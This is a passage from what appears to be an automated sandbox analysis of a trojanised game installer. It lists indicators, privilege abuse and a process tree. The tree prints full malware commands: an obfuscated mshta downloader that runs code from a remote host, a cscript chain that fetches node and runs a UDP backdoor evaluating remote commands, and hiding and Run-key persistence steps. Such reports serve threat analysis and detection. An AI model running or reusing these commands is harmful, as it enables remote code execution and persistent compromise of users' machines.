Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	99DEaZ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	99DEaZ.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	99DEaZ.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	99DEaZ.exe

NTFS ADS 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Temp\229480348b2c9124:ads	node.exe
File created	C:\ProgramData\DNTException\node.exe:651d21a1c3230537fd9d59dba17cd040	node.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	48	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	41	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
1948	Anime-Fighters-Infin_734316524.tmp
1948	Anime-Fighters-Infin_734316524.tmp
1800	Expedita.exe
1800	Expedita.exe
1800	Expedita.exe
1108	MsiExec.exe
1780	MsiExec.exe
1780	MsiExec.exe
1328	msiexec.exe
1328	msiexec.exe
2608	node.exe
2608	node.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: 33	1840	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1840	AUDIODG.EXE
Token: 33	1840	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1840	AUDIODG.EXE
Token: SeRestorePrivilege	1328	msiexec.exe
Token: SeTakeOwnershipPrivilege	1328	msiexec.exe
Token: SeSecurityPrivilege	1328	msiexec.exe
Token: SeCreateTokenPrivilege	2028	99DEaZ.exe
Token: SeAssignPrimaryTokenPrivilege	2028	99DEaZ.exe
Token: SeLockMemoryPrivilege	2028	99DEaZ.exe
Token: SeIncreaseQuotaPrivilege	2028	99DEaZ.exe
Token: SeMachineAccountPrivilege	2028	99DEaZ.exe
Token: SeTcbPrivilege	2028	99DEaZ.exe
Token: SeSecurityPrivilege	2028	99DEaZ.exe
Token: SeTakeOwnershipPrivilege	2028	99DEaZ.exe
Token: SeLoadDriverPrivilege	2028	99DEaZ.exe
Token: SeSystemProfilePrivilege	2028	99DEaZ.exe
Token: SeSystemtimePrivilege	2028	99DEaZ.exe
Token: SeProfSingleProcessPrivilege	2028	99DEaZ.exe
Token: SeIncBasePriorityPrivilege	2028	99DEaZ.exe
Token: SeCreatePagefilePrivilege	2028	99DEaZ.exe
Token: SeCreatePermanentPrivilege	2028	99DEaZ.exe
Token: SeBackupPrivilege	2028	99DEaZ.exe
Token: SeRestorePrivilege	2028	99DEaZ.exe
Token: SeShutdownPrivilege	2028	99DEaZ.exe
Token: SeDebugPrivilege	2028	99DEaZ.exe
Token: SeAuditPrivilege	2028	99DEaZ.exe
Token: SeSystemEnvironmentPrivilege	2028	99DEaZ.exe
Token: SeChangeNotifyPrivilege	2028	99DEaZ.exe
Token: SeRemoteShutdownPrivilege	2028	99DEaZ.exe
Token: SeUndockPrivilege	2028	99DEaZ.exe
Token: SeSyncAgentPrivilege	2028	99DEaZ.exe
Token: SeEnableDelegationPrivilege	2028	99DEaZ.exe
Token: SeManageVolumePrivilege	2028	99DEaZ.exe
Token: SeImpersonatePrivilege	2028	99DEaZ.exe
Token: SeCreateGlobalPrivilege	2028	99DEaZ.exe
Token: SeCreateTokenPrivilege	2028	99DEaZ.exe
Token: SeAssignPrimaryTokenPrivilege	2028	99DEaZ.exe
Token: SeLockMemoryPrivilege	2028	99DEaZ.exe
Token: SeIncreaseQuotaPrivilege	2028	99DEaZ.exe
Token: SeMachineAccountPrivilege	2028	99DEaZ.exe
Token: SeTcbPrivilege	2028	99DEaZ.exe
Token: SeSecurityPrivilege	2028	99DEaZ.exe
Token: SeTakeOwnershipPrivilege	2028	99DEaZ.exe
Token: SeLoadDriverPrivilege	2028	99DEaZ.exe
Token: SeSystemProfilePrivilege	2028	99DEaZ.exe
Token: SeSystemtimePrivilege	2028	99DEaZ.exe
Token: SeProfSingleProcessPrivilege	2028	99DEaZ.exe
Token: SeIncBasePriorityPrivilege	2028	99DEaZ.exe
Token: SeCreatePagefilePrivilege	2028	99DEaZ.exe
Token: SeCreatePermanentPrivilege	2028	99DEaZ.exe
Token: SeBackupPrivilege	2028	99DEaZ.exe
Token: SeRestorePrivilege	2028	99DEaZ.exe
Token: SeShutdownPrivilege	2028	99DEaZ.exe
Token: SeDebugPrivilege	2028	99DEaZ.exe
Token: SeAuditPrivilege	2028	99DEaZ.exe
Token: SeSystemEnvironmentPrivilege	2028	99DEaZ.exe
Token: SeChangeNotifyPrivilege	2028	99DEaZ.exe
Token: SeRemoteShutdownPrivilege	2028	99DEaZ.exe
Token: SeUndockPrivilege	2028	99DEaZ.exe
Token: SeSyncAgentPrivilege	2028	99DEaZ.exe
Token: SeEnableDelegationPrivilege	2028	99DEaZ.exe
Token: SeManageVolumePrivilege	2028	99DEaZ.exe
Token: SeImpersonatePrivilege	2028	99DEaZ.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1948	Anime-Fighters-Infin_734316524.tmp
2028	99DEaZ.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1992 wrote to memory of 1948	1992	Anime-Fighters-Infin_734316524.exe	26
PID 1992 wrote to memory of 1948	1992	Anime-Fighters-Infin_734316524.exe	26
PID 1992 wrote to memory of 1948	1992	Anime-Fighters-Infin_734316524.exe	26
PID 1992 wrote to memory of 1948	1992	Anime-Fighters-Infin_734316524.exe	26
PID 1992 wrote to memory of 1948	1992	Anime-Fighters-Infin_734316524.exe	26
PID 1992 wrote to memory of 1948	1992	Anime-Fighters-Infin_734316524.exe	26
PID 1992 wrote to memory of 1948	1992	Anime-Fighters-Infin_734316524.exe	26
PID 1948 wrote to memory of 1800	1948	Anime-Fighters-Infin_734316524.tmp	27
PID 1948 wrote to memory of 1800	1948	Anime-Fighters-Infin_734316524.tmp	27
PID 1948 wrote to memory of 1800	1948	Anime-Fighters-Infin_734316524.tmp	27
PID 1948 wrote to memory of 1800	1948	Anime-Fighters-Infin_734316524.tmp	27
PID 1800 wrote to memory of 1784	1800	Expedita.exe	34
PID 1800 wrote to memory of 1784	1800	Expedita.exe	34
PID 1800 wrote to memory of 1784	1800	Expedita.exe	34
PID 1800 wrote to memory of 1784	1800	Expedita.exe	34
PID 1800 wrote to memory of 2028	1800	Expedita.exe	35
PID 1800 wrote to memory of 2028	1800	Expedita.exe	35
PID 1800 wrote to memory of 2028	1800	Expedita.exe	35
PID 1800 wrote to memory of 2028	1800	Expedita.exe	35
PID 1800 wrote to memory of 2028	1800	Expedita.exe	35
PID 1800 wrote to memory of 2028	1800	Expedita.exe	35
PID 1800 wrote to memory of 2028	1800	Expedita.exe	35
PID 1328 wrote to memory of 1108	1328	msiexec.exe	39
PID 1328 wrote to memory of 1108	1328	msiexec.exe	39
PID 1328 wrote to memory of 1108	1328	msiexec.exe	39
PID 1328 wrote to memory of 1108	1328	msiexec.exe	39
PID 1328 wrote to memory of 1108	1328	msiexec.exe	39
PID 1328 wrote to memory of 1108	1328	msiexec.exe	39
PID 1328 wrote to memory of 1108	1328	msiexec.exe	39
PID 2028 wrote to memory of 1992	2028	99DEaZ.exe	40
PID 2028 wrote to memory of 1992	2028	99DEaZ.exe	40
PID 2028 wrote to memory of 1992	2028	99DEaZ.exe	40
PID 2028 wrote to memory of 1992	2028	99DEaZ.exe	40
PID 2028 wrote to memory of 1992	2028	99DEaZ.exe	40
PID 2028 wrote to memory of 1992	2028	99DEaZ.exe	40
PID 2028 wrote to memory of 1992	2028	99DEaZ.exe	40
PID 1328 wrote to memory of 1780	1328	msiexec.exe	41
PID 1328 wrote to memory of 1780	1328	msiexec.exe	41
PID 1328 wrote to memory of 1780	1328	msiexec.exe	41
PID 1328 wrote to memory of 1780	1328	msiexec.exe	41
PID 1328 wrote to memory of 1780	1328	msiexec.exe	41
PID 1328 wrote to memory of 1780	1328	msiexec.exe	41
PID 1328 wrote to memory of 1780	1328	msiexec.exe	41
PID 1780 wrote to memory of 1320	1780	MsiExec.exe	42
PID 1780 wrote to memory of 1320	1780	MsiExec.exe	42
PID 1780 wrote to memory of 1320	1780	MsiExec.exe	42
PID 1780 wrote to memory of 1320	1780	MsiExec.exe	42
PID 1328 wrote to memory of 1148	1328	msiexec.exe	44
PID 1328 wrote to memory of 1148	1328	msiexec.exe	44
PID 1328 wrote to memory of 1148	1328	msiexec.exe	44
PID 1328 wrote to memory of 1148	1328	msiexec.exe	44
PID 1328 wrote to memory of 1148	1328	msiexec.exe	44
PID 1328 wrote to memory of 1148	1328	msiexec.exe	44
PID 1328 wrote to memory of 1148	1328	msiexec.exe	44
PID 1784 wrote to memory of 2292	1784	11zeb2.exe	47
PID 1784 wrote to memory of 2292	1784	11zeb2.exe	47
PID 1784 wrote to memory of 2292	1784	11zeb2.exe	47
PID 1784 wrote to memory of 2292	1784	11zeb2.exe	47
PID 2292 wrote to memory of 2324	2292	cmd.exe	49
PID 2292 wrote to memory of 2324	2292	cmd.exe	49
PID 2292 wrote to memory of 2324	2292	cmd.exe	49
PID 2292 wrote to memory of 2324	2292	cmd.exe	49
PID 2324 wrote to memory of 2336	2324	00731710590.exe	50
PID 2324 wrote to memory of 2336	2324	00731710590.exe	50

Views/modifies file attributes 1 TTPs 6 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
6968	attrib.exe
6980	attrib.exe
6992	attrib.exe
2732	attrib.exe
2744	attrib.exe
6956	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Anime-Fighters-Infin_734316524.exe
"C:\Users\Admin\AppData\Local\Temp\Anime-Fighters-Infin_734316524.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1992
- C:\Users\Admin\AppData\Local\Temp\is-6LFA2.tmp\Anime-Fighters-Infin_734316524.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-6LFA2.tmp\Anime-Fighters-Infin_734316524.tmp" /SL5="$30106,3656070,140800,C:\Users\Admin\AppData\Local\Temp\Anime-Fighters-Infin_734316524.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:1948
- - C:\Program Files (x86)\Vel\magnam\Expedita.exe
    "C:\Program Files (x86)\Vel/\magnam\Expedita.exe" 32cb7aca069a0c8bb8d51fccce1d3826
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1800
  - - C:\Users\Admin\AppData\Local\Temp\arjPj5gZ\11zeb2.exe
      C:\Users\Admin\AppData\Local\Temp\arjPj5gZ\11zeb2.exe /usthree SUB=32cb7aca069a0c8bb8d51fccce1d3826
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:1784
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{Dmp2-IBVR2-1m6P-tHF8g}\00731710590.exe"
        5⤵
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:2292
      - C:\Users\Admin\AppData\Local\Temp\{Dmp2-IBVR2-1m6P-tHF8g}\00731710590.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{Dmp2-IBVR2-1m6P-tHF8g}\00731710590.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2324
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta "javascript:document.write();0;y=unescape('%320%33%7E%68t%74p%3A%2F%2Fa%73u%310%2Ef%75n%2Fh%72i%2F%3F%321%616%654%62%7E%330').split('~');240;try{x='WinHttp';235;x=new ActiveXObject(x+'.'+x+'Request.5.1');239;x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1);72;x.send();82;y='ipt.S';78;new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2);196;}catch(e){};2;;window.close();"
        7⤵
        Blocklisted process makes network request
        
        PID:2336
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /d/s/c cd /d "C:\ProgramData" & mkdir "DNTException" & cd "DNTException" & dir /a node.exe || ( echo x=new ActiveXObject("WinHttp.WinHttpRequest.5.1"^);x.Open("GET",unescape(WScript.Arguments(0^)^),false^);x.Send(^);b=new ActiveXObject("ADODB.Stream"^);b.Type=1;b.Open(^);b.Write(x.ResponseBody^);b.SaveToFile(WScript.Arguments(1^),2^); > get1630610018286.txt & cscript /nologo /e:jscript get1630610018286.txt "http%3A%2F%2Fasu10.fun%2Fhri%2F%3F2cbc5f352%26b%3Dfe577fa7" node.cab & expand node.cab node.exe & del get1630610018286.txt node.cab ) & echo new ActiveXObject("WScript.Shell").Run(WScript.Arguments(0),0,false); > get1630610018286.txt & cscript /nologo /e:jscript get1630610018286.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27cbc5f352%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu10.fun%27);s.send(b,0,b.length,19584,%27lu1.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))" & del get1630610018286.txt
        8⤵
        
        PID:2428
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript /nologo /e:jscript get1630610018286.txt "http%3A%2F%2Fasu10.fun%2Fhri%2F%3F2cbc5f352%26b%3Dfe577fa7" node.cab
        9⤵
        Blocklisted process makes network request
        
        PID:2460
        
        C:\Windows\SysWOW64\expand.exe
        
        expand node.cab node.exe
        9⤵
        Drops file in Windows directory
        
        PID:2528
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript /nologo /e:jscript get1630610018286.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27cbc5f352%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu10.fun%27);s.send(b,0,b.length,19584,%27lu1.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))"
        9⤵
        Loads dropped DLL
        
        PID:2548
        
        C:\ProgramData\DNTException\node.exe
        
        "C:\ProgramData\DNTException\node.exe" -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27cbc5f352%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu10.fun%27);s.send(b,0,b.length,19584,%27lu1.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))
        10⤵
        Executes dropped EXE
        Checks processor information in registry
        NTFS ADS
        Suspicious behavior: EnumeratesProcesses
        
        PID:2608
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c dir C:\
        11⤵
        
        PID:2684
        
        C:\Windows\SysWOW64\cacls.exe
        
        cacls.exe C:\ProgramData\DNTException /t /e /c /g Everyone:F
        11⤵
        
        PID:2700
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls.exe C:\ProgramData\DNTException /t /c /grant *S-1-1-0:(f)
        11⤵
        Modifies file permissions
        
        PID:2716
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib.exe +H C:\ProgramData\DNTException
        11⤵
        Views/modifies file attributes
        
        PID:2732
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib.exe +H C:\ProgramData\DNTException\node.exe
        11⤵
        Views/modifies file attributes
        
        PID:2744
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /fo csv /nh
        11⤵
        Enumerates processes with tasklist
        
        PID:2296
        
        C:\Windows\SysWOW64\Wbem\wmic.exe
        
        wmic process get processid,parentprocessid,name,executablepath /format:csv
        11⤵
        
        PID:2360
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig.exe /all
        11⤵
        Gathers network information
        
        PID:2364
        
        C:\Windows\SysWOW64\route.exe
        
        route.exe print
        11⤵
        
        PID:2388
        
        C:\Windows\SysWOW64\netstat.exe
        
        netstat.exe -ano
        11⤵
        Gathers network information
        
        PID:2520
        
        C:\Windows\SysWOW64\systeminfo.exe
        
        systeminfo.exe /fo csv
        11⤵
        Gathers system information
        
        PID:2484
        
        C:\Windows\SysWOW64\cacls.exe
        
        cacls.exe C:\ProgramData\Intel /t /e /c /g Everyone:F
        11⤵
        
        PID:6924
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls.exe C:\ProgramData\Intel /t /c /grant *S-1-1-0:(f)
        11⤵
        Modifies file permissions
        
        PID:6940
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib.exe +H C:\ProgramData\Intel
        11⤵
        Views/modifies file attributes
        
        PID:6956
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib.exe +H "C:\ProgramData\Intel\Intel(R) Management Engine Components"
        11⤵
        Views/modifies file attributes
        
        PID:6968
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib.exe +H "C:\ProgramData\Intel\Intel(R) Management Engine Components\Intel MEC 3611790753"
        11⤵
        Views/modifies file attributes
        
        PID:6980
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib.exe +H "C:\ProgramData\Intel\Intel(R) Management Engine Components\Intel MEC 2740857950"
        11⤵
        Views/modifies file attributes
        
        PID:6992
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
        11⤵
        Modifies registry key
        
        PID:7004
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Intel Management Engine Components 2489498475" /t REG_SZ /d "wscript.exe /t:30 /nologo /e:jscript \"C:\ProgramData\Intel\Intel(R) Management Engine Components\Intel MEC 2740857950\" \"C:\ProgramData\Intel\Intel(R) Management Engine Components\" 1971215467" /f
        11⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:7016
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{Dmp2-IBVR2-1m6P-tHF8g}\00096575022.exe" /us
        5⤵
        Loads dropped DLL
        
        PID:2760
      - C:\Users\Admin\AppData\Local\Temp\{Dmp2-IBVR2-1m6P-tHF8g}\00096575022.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{Dmp2-IBVR2-1m6P-tHF8g}\00096575022.exe" /us
        6⤵
        Executes dropped EXE
        Checks processor information in registry
        
        PID:2788
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"
        5⤵
        Loads dropped DLL
        
        PID:2820
      - C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe
        
        "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2856
        
        C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe
        
        "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies system certificate store
        
        PID:3028
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "11zeb2.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\arjPj5gZ\11zeb2.exe" & exit
        5⤵
        
        PID:2848
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "11zeb2.exe" /f
        6⤵
        Kills process with taskkill
        
        PID:2908
  - - C:\Users\Admin\AppData\Local\Temp\ZypDsIsW\99DEaZ.exe
      C:\Users\Admin\AppData\Local\Temp\ZypDsIsW\99DEaZ.exe /qn CAMPAIGN="642"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Enumerates connected drives
      Modifies system certificate store
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:2028
    - - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=642 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ZypDsIsW\99DEaZ.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ZypDsIsW\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630350905 /qn CAMPAIGN=""642"" " CAMPAIGN="642"
        5⤵
        
        PID:1992

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x510
